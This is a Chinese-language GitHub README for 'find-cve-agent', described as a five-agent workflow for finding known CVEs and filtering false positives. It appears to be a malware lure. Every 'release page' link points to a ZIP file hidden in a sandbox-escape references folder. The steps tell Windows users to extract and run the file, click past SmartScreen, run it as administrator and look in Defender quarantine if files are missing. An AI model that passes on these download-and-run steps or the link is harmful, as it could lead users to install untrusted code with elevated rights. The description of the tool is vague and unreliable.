Liaabnormal676/find-cve-agent
GitHub: Liaabnormal676/find-cve-agent
一款基于多代理协作的工作流工具,用于在开源包中系统性查找已知 CVE 并过滤误报。
Stars: 0 | Forks: 0
# 🕵️ find-cve-agent - 用更少的噪音查找漏洞
[](https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip)
## 🚀 快速开始
find-cve-agent 帮助您以引导式的方式审查软件中的已知安全问题。它专为 Windows 用户设计,提供从下载到首次运行的简洁路径。
使用它可以:
- 使用一组检查扫描目标
- 减少误报
- 保持研究有序
- 通过可重复的流程工作
## 💾 下载应用
1. 打开此处的发布页面:https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip
2. 在页面顶部附近找到最新版本
3. 在 **Assets** 下下载 Windows 文件
4. 将文件保存到桌面或 Downloads 文件夹
5. 如果文件在 ZIP 文件夹中,右键点击并选择 **全部提取**
6. 打开提取后文件夹中的应用文件
如果 Windows 请求权限,请选择 **更多详细信息**,然后仅在信任来源且希望继续时选择 **仍要运行**
## 🖥️ Windows 安装
在开始之前,请确保您已具备以下条件:
- Windows 10 或 Windows 11
- 稳定的互联网连接
- 为应用及其检查预留足够的磁盘空间
- 运行来自 GitHub 下载的文件权限
如果发布包包含便携应用,解压后即可运行。如果包含安装程序,请按照屏幕提示操作,并保持默认选项,除非您希望使用不同的文件夹。
## ▶️ 首次运行
1. 打开应用
2. 等待首次加载完成
3. 输入要审查的目标或项目
4. 选择要运行的检查
5. 启动扫描
6. 在主窗口中查看结果
应用可能需要几分钟来构建首次结果。如果正在检查大量文件或规则,这是正常的。
## 🔍 它做什么
find-cve-agent 为系统性漏洞研究而设计。它采用团队协作流程,帮助您按稳定顺序遍历目标。
您可以用它来:
- 查找已知 CVE
- 跨多个检查比较发现
- 减少重复告警
- 聚焦需要审查的项目
- 跟踪工作过程中的结果
它专为安全研究、漏洞赏金工作和防御性测试而构建。
## 🤖 代理团队
应用采用五代理工作流程。每个部分都有明确职责。
- **Planner**:设置检查顺序
- **Scanner**:运行搜索步骤
- **Filter**:移除明显的误命中
- **Reviewer**:检查发现的上下文
- **Reporter**:收集最终输出
这种分工有助于保持流程一致且更易遵循。
## 🧰 包含的技能
应用包含 20 项为 CVE 挖掘和结果审查而构建的技能。这些技能可能涵盖:
- 文件和代码模式检查
- 基于规则的搜索
- 版本匹配
- 暴露审查
- 路径检查
- 服务审查
- Web 应用检查
- 结果排序
- 误报移除
- 笔记记录
- 报告准备
每项技能支持工作流程的一部分,因此您无需为每个步骤单独设置工具。
## 🧪 典型使用场景
当您希望:
- 审查项目中的已知安全问题
- 在披露前查找薄弱环节
- 检查文件中的风险模式
- 确认告警是否真实
- 记录测试内容
使用 find-cve-agent 特别适合需要引导式检查流程,而非松散工具集的用户。
## ⚙️ 基本流程
1. 打开应用
2. 加载要检查的目标
3. 选择扫描模式
4. 运行检查
5. 审查每个结果
6. 标记误命中
7. 保存或导出最终发现
如果不确定从哪里开始,请先使用默认扫描路径。它会在您缩小搜索范围之前提供全局视图。
## 📁 下载后预期内容
下载并打开发布包后,您可能会看到:
- 可运行的应用文件
- 包含支持文件的文件夹
- 包含发布说明的 README 文件
- 示例配置文件或预设
如果发布包要求,请将应用及其支持文件保持在同一文件夹中。
## 🛠️ 如果应用无法打开
尝试以下步骤:
1. 右键点击应用并选择 **以管理员身份运行**
2. 检查文件是否已完成下载
3. 确保已解压 ZIP 文件
4. 将文件夹移动到简单路径,如 `C:\Apps\find-cve-agent`
5. 如果文件丢失,请检查 Windows Defender 隔离区
6. 从发布页面重新下载最新版本
## 🔐 安全使用
仅对您拥有或获得授权测试的系统与目标使用该工具。将扫描集中在您自己的工作、实验室系统或已批准的研究任务上。
## 🧭 它的用处体现在
find-cve-agent 保持流程清晰。它帮助您:
- 从开始到结束遵循一条路径
- 减少弱匹配带来的噪音
- 聚焦可能的问题
- 保持工作有序
- 以相同步骤重复检查
## 📦 发布页面
在此下载或更新应用:https://raw.githubusercontent.com/Liaabnormal676/find-cve-agent/main/skills/sandbox-escape/references/agent_cve_find_v3.9.zip
请使用此页面获取新版本、修复构建和 Windows 下载。
## 📝 简洁启动路径
1. 打开发布页面
2. 下载最新的 Windows 文件
3. 如需要则解压
4. 打开应用
5. 运行首次扫描
6. 查看结果
7. 保存希望保留的发现
## 🧩 关键词
ai-agent, bug-bounty, claude-code, claude-code-plugin, cve, cve-hunting, false-positive, offensive-security, penetration-testing, responsible-disclosure, security-automation, security-research, security-tools, semgrep, vulnerability-detection
标签:Claude Code, CVE 查找, Maven, URL发现, Windows 安全工具, 代码安全分析, 多智能体, 威胁情报, 安全合规, 安全检测, 开发者工具, 开放策略代理, 攻击面分析, 沙箱逃逸, 漏洞验证, 结构化查询, 网络代理, 自动化安全, 自定义脚本, 误报过滤, 软件审查, 逆向工具, 防御框架